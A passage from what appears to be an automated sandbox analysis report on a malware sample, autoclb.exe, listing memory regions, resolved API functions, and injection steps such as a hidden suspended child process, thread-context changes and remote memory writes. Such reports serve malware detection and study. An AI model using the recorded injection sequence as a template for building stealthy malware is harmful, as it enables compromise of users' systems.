ole32.dll 0x7ff8ec300000 0x7ff8ec440fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff8ec450000 0x7ff8ec575fff Memory Mapped File rwx False False False -
shell32.dll 0x7ff8ec580000 0x7ff8edaa4fff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff8edbc0000 0x7ff8edd44fff Memory Mapped File rwx False False False -
combase.dll 0x7ff8edd60000 0x7ff8edfdbfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff8edfe0000 0x7ff8ee030fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff8ee0b0000 0x7ff8ee14cfff Memory Mapped File rwx False False False -
imm32.dll 0x7ff8ee150000 0x7ff8ee185fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff8ee190000 0x7ff8ee235fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff8ee2d0000 0x7ff8ee37cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x5c0000, size = 1257472 True 1 Fn
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x700000, size = 792 True 1 Fn, Data
Modify Control Flow #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 os_tid = 0xfdc, address = 0x73454000 True 1 Fn
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x7ff673b43440, size = 4 True 1 Fn, Data
Host Behavior
Module (173)
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1 Fn
Load KERNEL32.dll base_address = 0x0 True 1 Fn
Load AVIFIL32.dll - False 1 Fn
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwClose, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = _wcsupr, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = _strupr, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = memmove, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = bsearch, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = _strlwr, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = atoi, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = strstr, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = wcscpy, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = sprintf, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = _snprintf, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = memset, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = memcpy, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = strcpy, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = mbstowcs, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = memcmp, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = __chkstk, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetVersion, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CloseHandle, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateFileA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = Sleep, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GlobalLock, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrlenA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetLastError, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = HeapFree, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcatA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WriteFile, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = HeapCreate, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SetEvent, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetTickCount, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CopyFileW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrlenW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateEventA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LocalFree, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SuspendThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ResumeThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateFileW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ResetEvent, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcatW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetFileSize, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SetLastError, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = VirtualFree, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ReadFile, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = Thread32First, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenThread, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = Thread32Next, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CancelIo, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0x9eda67f910 True 1 Fn
Process #9: autoclb.exe
Information Value
ID #9
File Name c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:14, Reason: Autostart
Unmonitor End Time: 00:03:20, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
Information Value
PID 0x5f0
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x4F8
0x3EC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
locale.nls 0x001d0000 0x0028dfff Memory Mapped File r False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x002e1fff Private Memory rwx True False False -
private_0x0000000000310000 0x00310000 0x0031ffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory rw True False False -
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory rw True False False -
private_0x0000000000390000 0x00390000 0x003fefff Private Memory rwx True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory rw True False False -
private_0x0000000000650000 0x00650000 0x0074ffff Private Memory rw True False False -
pagefile_0x0000000000750000 0x00750000 0x008d7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008e0000 0x008e0000 0x00a60fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a70000 0x00a70000 0x01e6ffff Pagefile Backed Memory r True False False -
private_0x0000000001e70000 0x01e70000 0x01feffff Private Memory rw True False False -
private_0x0000000001e70000 0x01e70000 0x01f20fff Private Memory rwx True False False -
pagefile_0x0000000001f30000 0x01f30000 0x01fa0fff Pagefile Backed Memory rwx True False False -
private_0x0000000001fe0000 0x01fe0000 0x01feffff Private Memory rw True False False -
private_0x0000000001ff0000 0x01ff0000 0x02166fff Private Memory rw True False False -
private_0x0000000002170000 0x02170000 0x022e8fff Private Memory rw True False False -
wow64.dll 0x61eb0000 0x61efefff Memory Mapped File rwx False False False -
wow64cpu.dll 0x61f00000 0x61f07fff Memory Mapped File rwx False False False -
wow64win.dll 0x61f10000 0x61f82fff Memory Mapped File rwx False False False -
comctl32.dll 0x74900000 0x74991fff Memory Mapped File rwx False False False -
version.dll 0x749a0000 0x749a7fff Memory Mapped File rwx False False False -
apphelp.dll 0x749b0000 0x74a40fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74a50000 0x74aa8fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74ab0000 0x74ab9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74ac0000 0x74addfff Memory Mapped File rwx False False False -
sechost.dll 0x74ae0000 0x74b22fff Memory Mapped File rwx False False False -
combase.dll 0x74bb0000 0x74d69fff Memory Mapped File rwx False False False -
kernel32.dll 0x74d70000 0x74e5ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x75190000 0x751d3fff Memory Mapped File rwx False False False -
imm32.dll 0x751e0000 0x7520afff Memory Mapped File rwx False False False -
shell32.dll 0x75210000 0x765cefff Memory Mapped File rwx False False False -
shcore.dll 0x765d0000 0x7665cfff Memory Mapped File rwx False False False -
user32.dll 0x766f0000 0x7682ffff Memory Mapped File rwx False False False -
msctf.dll 0x76890000 0x769affff Memory Mapped File rwx False False False -
windows.storage.dll 0x76a50000 0x76f2cfff Memory Mapped File rwx False False False -
powrprof.dll 0x770a0000 0x770e3fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x770f0000 0x7719bfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77200000 0x7720bfff Memory Mapped File rwx False False False -
profapi.dll 0x77340000 0x7734efff Memory Mapped File rwx False False False -
gdi32.dll 0x773b0000 0x774fcfff Memory Mapped File rwx False False False -
advapi32.dll 0x77510000 0x7758afff Memory Mapped File rwx False False False -
msvcrt.dll 0x77600000 0x776bdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x77830000 0x779a5fff Memory Mapped File rwx False False False -
ntdll.dll 0x779b0000 0x77b28fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff977f2ffff Private Memory r True False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
private_0x00007ff9780f2000 0x7ff9780f2000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
Operation Filename Additional Information Success Count
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0x51c, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Thread (3)
Operation Process Additional Information Success Count
Get Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Set Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Resume c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x4f8 True 1
Memory (2)
Operation Process Additional Information Success Count
Read C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Module (14)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74d70000 True 2
Get Filename - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1
Get Filename - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 259 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x74d8a330 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74d87580 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74d89910 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74d8f400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74d88b70 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74d974f0 True 1
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1
Map - process_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Map - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f30000 True 1
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
Process #10: autoclb.exe
Information Value
ID #10
File Name c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:20, Reason: Child Process
Unmonitor End Time: 00:03:28, Reason: Self Terminated
Monitor Duration 00:00:08
OS Process Information
Information Value
PID 0x51c
Parent PID 0x5f0 (c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x710
0x58C
0x2D0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0015ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory rw True False False -
locale.nls 0x00210000 0x002cdfff Memory Mapped File r False False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x0057ffff Private Memory rw True False False -
private_0x0000000000590000 0x00590000 0x0068ffff Private Memory rw True False False -
pagefile_0x0000000000690000 0x00690000 0x00817fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000009b0000 0x009b0000 0x01daffff Pagefile Backed Memory r True False False -
